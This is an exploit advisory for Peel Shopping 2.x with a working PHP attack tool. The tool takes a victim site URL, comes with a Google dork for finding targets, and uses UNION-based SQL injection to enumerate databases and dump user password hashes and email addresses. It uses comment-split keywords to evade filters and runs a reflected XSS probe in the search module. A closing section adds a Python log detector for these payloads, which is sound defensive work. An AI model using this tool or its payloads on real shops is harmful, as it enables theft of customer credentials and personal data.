Peel Shopping 2.x Cross Site Scripting / SQL Injection

Peel Shopping versions 2.x up to (but not including) 3.1 suffer from cross site scripting and remote SQL injection vulnerabilities. The issues were originally discovered in 2012 by Cyber-Crystal; this advisory provides more details and a working test harness.

Packet Storm
# Exploit Title: Peel Shopping "catid=" SQL injection
# Google Dork: inurl:/lire/index.php?rubid=
# Date: 2024-10-02
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://www.peel-shopping.com/
# Software Link: https://github.com/advisto/peel-shopping
# Version: 2.x < 3.1
# Tested on: Windows 10
#
# USAGE:
#
# 1. If you want to test this query: produit_details.php?id=1000&catid=100, you need the db name.
# 2. If you want to test the single parameter index.php?catid=, leave the field at its default.
# 3. If you want to test the parameter index.php?rubid=, you don't need the db name. (#Expl-3)
#
# Details:
# You can also test the search module, which is affected by XSS.
# If you see many iframes, they are the switch between the tables or parameters;
# carefully use the '/' characters in the full path and '-' before the numeric vars.

[code] Multiple Vulnerabilities exploit [tested]
<?php
// Peel Shopping 2.x < 3.1 "catid=" / "rubid=" SQL injection and search-module XSS tester.
// Serve this file from a local PHP web server; every form posts back to this script.
$self = htmlspecialchars($_SERVER['PHP_SELF']);

// #Expl-1, step 1: enumerate database names through the UNION in catid=.
// GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) joins them with "<br>".
$schemata_payload = '%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--';

// Strings stripped from the scraped cell: MySQL system schemas plus the French
// boilerplate ("Accueil" = home, "Vous êtes ici" = you are here) around the injected output.
$cleaning = array("performance_schema", "information_schema", "Accueil", "Vous", "ici", "tes");

// #Expl-1, step 2: the @x trick accumulates every mot_passe/email row into one string
// so a whole table fits in the single UNION column that is reflected in the page.
function rows_payload($table) {
    return '%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(' . $table . ')WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--';
}

// Print every distinct e-mail address found in a fetched page.
function print_emails($html) {
    $n = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i", $html, $matches);
    if ($n) {
        foreach (array_unique($matches[0]) as $email) {
            echo $email . "<br />";
        }
    } else {
        echo "No emails found.";
    }
}

echo '<html><head><title>Peel Shopping 2.x < 3.1 "catid=" SQL injection</title></head>
<body bgcolor="black"><font color="white"><center><pre>
##################################
# Peel Shopping 2.x < 3.1 Exploit #
# vuln finder!                   #
# Code by Emiliano Febbi - 2024  #
##################################
( first get db name and later run exploit )</pre>
<h2>#Expl-1</h2>
1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=<br><br>
<form action="' . $self . '" method="post">
<font color="white">#Get Database Name:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font><br>
<input type="text" name="victim_site"><input type="submit" value="Get!"></form><br>
<font color="yellow">###########################################################</font>
<form action="' . $self . '" method="post">
<font color="white">[#insert victim site]:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font> or<br>
<font color="lime">(*http://www.site.fr/index.php?catid=-1)</font><- DB_Name default<br>
<input type="text" name="victim_sitee"><br>
[#insert database name]:<br>
<input type="text" name="victim_db" value="default"><input type="submit" value="LOAD"></form><br>
<font color="yellow">###########################################################</font><br>
<h2>#Expl-2</h2>
<form action="' . $self . '" method="post">
<font color="white">#XSS Test[search_module]:<font color="red"><br>(*Format: http://www.site.fr/)</font><br>
<input type="text" name="site_XSS" value="http://www.site.fr/"><input type="submit" value="test!"></form><br>
<font color="yellow">###########################################################</font><br>
</font></center>';

/*#exploit*/
if (!empty($_POST['victim_site'])) {
    $site = $_POST['victim_site'];
    $page = file_get_contents($site . $schemata_payload);

    print "<center><font color='red'>#DB_Name:</font>(try-1)<br>";
    // try-1: the injected column lands inside a <td class="petit"> cell
    $tags = explode('<td class="petit">', $page);
    $tags = explode("</td>", isset($tags[1]) ? $tags[1] : '');
    var_dump(strip_tags(str_replace($cleaning, "", $tags[0])));
    print "</center><br><br>";

    print "<center><font color='red'>#DB_Name:</font>(try-2)<br>";
    // try-2: take everything after "information_schema<br>" up to the next link
    $tags = explode('information_schema<br>', $page);
    $tags = explode('" href=', isset($tags[1]) ? $tags[1] : '');
    var_dump(strip_tags(str_replace($cleaning, "", $tags[0])));
    print "</center>";
}

/*#exploit*/
if (!empty($_POST['victim_sitee']) && !empty($_POST['victim_db'])) {
    $sitee   = $_POST['victim_sitee'];
    $hack_db = $_POST['victim_db'];
    $url1 = $sitee . rows_payload($hack_db . '.peel_utilisateurs');
    $url2 = $sitee . rows_payload($hack_db . '.utilisateurs');
    $url3 = $sitee . '+union+all+select+1,mot_passe,3,4+FROM+peel_utilisateurs--';
?>
<center>
<font color='lime'>1- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> id=&catid=<br>
<iframe src='<?= $url1 ?>' title='exploit' height='100' width='500'></iframe><br>
<font color="yellow">###########################################################</font><br>
<font color='lime'>2- #ALL @E-Mail and Users: ~table -><font color='white'>utilisateurs</font></font>-> id=&catid=<br>
<iframe src='<?= $url2 ?>' title='exploit' height='100' width='500'></iframe><br>
<font color='lime'>3- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> catid=<br>
<iframe src='<?= $url3 ?>' title='exploit' height='100' width='500'></iframe>
</center>
<?php
    print "<center><font color='red'>[emails cracked]+md5:</font><br>";
    print_emails(file_get_contents($url1));
    print "</center>";
}

/*#exploit*/
// #Expl-3: independent path through index.php?rubid=. The "%23xyz%0A" sequence is a
// MySQL "#" comment followed by a newline, which splits UNION and SELECT across lines
// to slip past naive keyword filters while staying valid SQL.
echo '<center><h2>#Expl-3</h2><br>
<form action="' . $self . '" method="post">
<font color="white">independent -> #try again to hack!:</font><font color="red"><br>(*Format: http://www.site.fr)</font><br>
<input type="text" name="hack2" value="http://www.site.fr"><br>
<input type="submit" value="LOAD"></form></center><br>';

if (!empty($_POST['hack2'])) {
    $hackk = $_POST['hack2'];
    $rubid = $hackk . '/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+';
    echo '<center><br><font color="yellow">###########################################################</font><br>';
    echo "2 [#Query interested] -> index.php?rubid=<br>";
?>
<font color='red'>#password1:</font>(try-1)<br>
<iframe src='<?= $rubid ?>1,mot_passe,3+FROM+peel_utilisateurs--' title='exploit' height='100' width='500'></iframe><br>
<font color='red'>#password2:</font>(try-2)<br>
<iframe src='<?= $rubid ?>1,mot_passe,3+FROM+utilisateurs--' title='exploit' height='100' width='500'></iframe><br>
<font color='red'>#password3:</font>(try-3)<br>
<iframe src='<?= $rubid ?>1,mot_passe+FROM+peel_utilisateurs--' title='exploit' height='100' width='500'></iframe><br>
<font color='red'>#password4:</font>(try-4)<br>
<iframe src='<?= $rubid ?>1,mot_passe+FROM+utilisateurs--' title='exploit' height='100' width='500'></iframe><br>
<?php
    print "<font color='red'>[emails cracked]:</font><br>";
    print_emails(file_get_contents($hackk . '/index.php?rubid=-1+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,email,3%20FROM%20peel_utilisateurs--'));
    print "</center>";
}

/*#exploit*/
// #Expl-2: reflected XSS in the search module (recherche.php, motclef= parameter).
if (!empty($_POST['site_XSS'])) {
    $XSS = $_POST['site_XSS'];
?>
<center><iframe src='<?= $XSS ?>recherche.php?start=0&motclef=<script>alert("XSS vulnerable!")</script>' title='exploit3' height='100' width='500'></iframe></center><br>
<?php
}
echo '</body></html>';
?>
[/code]
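The rubid= payload above is the instructive part for defenders: a MySQL `#` comment plus an encoded newline (`%23xyz%0A`) sits between `UnIOn` and `SeLecT`, so a filter that looks for the literal string `union select` never sees it. The following is an added example, not part of the Packet Storm post or the author's tool: a Python detector that normalises query-string values the way the database tokenises them (decode, strip `/* */`, `#` and `-- ` comments, collapse whitespace, lower-case) before matching, and also flags non-integer values in Peel Shopping's numeric parameters. The access-log lines are constructed for the example (addresses from RFC 5737 ranges); treating `id`, `catid` and `rubid` as integer-only parameters is an assumption drawn from the advisory's own payloads, not a statement of the vendor's schema.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote_plus

# Assumption for this example: the three identifiers the advisory injects into are
# integer parameters, so any non-numeric value in them is suspicious on its own.
NUMERIC_PARAMS = {"id", "catid", "rubid"}

# Apache/nginx "combined" access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# MySQL comment forms an attacker can use as token separators.
C_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
LINE_COMMENT_RE = re.compile(r"(?:#|--[ \t]).*")   # '.' stops at the newline, which is the point
UNION_RE = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")
XSS_RE = re.compile(r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=")

# Constructed sample log: three requests shaped like the advisory's payloads, two benign.
SAMPLE_LOG = """
203.0.113.5 - - [02/Oct/2024:10:00:01 +0000] "GET /produit_details.php?id=1000&catid=-100%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)-- HTTP/1.1" 200 5123
203.0.113.5 - - [02/Oct/2024:10:00:02 +0000] "GET /index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+peel_utilisateurs-- HTTP/1.1" 200 4711
203.0.113.5 - - [02/Oct/2024:10:00:03 +0000] "GET /recherche.php?start=0&motclef=%3Cscript%3Ealert(%22XSS%20vulnerable!%22)%3C/script%3E HTTP/1.1" 200 3902
198.51.100.7 - - [02/Oct/2024:10:00:04 +0000] "GET /index.php?rubid=3 HTTP/1.1" 200 8001
198.51.100.7 - - [02/Oct/2024:10:00:05 +0000] "GET /recherche.php?start=0&motclef=union+jack+shirt HTTP/1.1" 200 6100
"""


def normalize(value: str) -> str:
    """Canonicalise a (once-decoded) query value the way MySQL would tokenise it."""
    s = unquote_plus(value)          # second decode pass catches %2523-style double encoding
    s = C_COMMENT_RE.sub(" ", s)
    s = LINE_COMMENT_RE.sub(" ", s)  # '#xyz\nUnIOn' -> ' \nUnIOn': the comment becomes whitespace
    return re.sub(r"\s+", " ", s).strip().lower()


def naive_match(raw_value: str) -> bool:
    """What a literal-string filter sees; it misses the comment-split keywords."""
    return "union select" in unquote_plus(raw_value).lower()


def classify_target(target: str) -> list[str]:
    """Return findings for one request target (path plus query string)."""
    _path, _, query = target.partition("?")
    findings: list[str] = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        v = normalize(raw)
        if name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", v):
            findings.append(f"{name}: non-numeric value in integer parameter")
        if UNION_RE.search(v):
            findings.append(f"{name}: UNION-based SQL injection")
        if "information_schema" in v:
            findings.append(f"{name}: schema enumeration via INFORMATION_SCHEMA")
        if XSS_RE.search(v):
            findings.append(f"{name}: reflected XSS probe")
    return findings


def scan_log(text: str) -> list[dict]:
    """Parse combined-format log lines and keep only those with findings."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_target(m["target"])
        if findings:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["ts"], hit["target"])
        for f in hit["findings"]:
            print("   ", f)
```

Run as a script it prints the three offending requests with their findings and stays silent on the two benign lines, including the search for "union jack shirt" that a bare `union` keyword rule would have flagged. The non-numeric check is the cheapest and least noisy signal here: every payload in the advisory starts by replacing an integer with `-1`, `-3` or `-100` followed by SQL, which no legitimate Peel Shopping link ever does.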
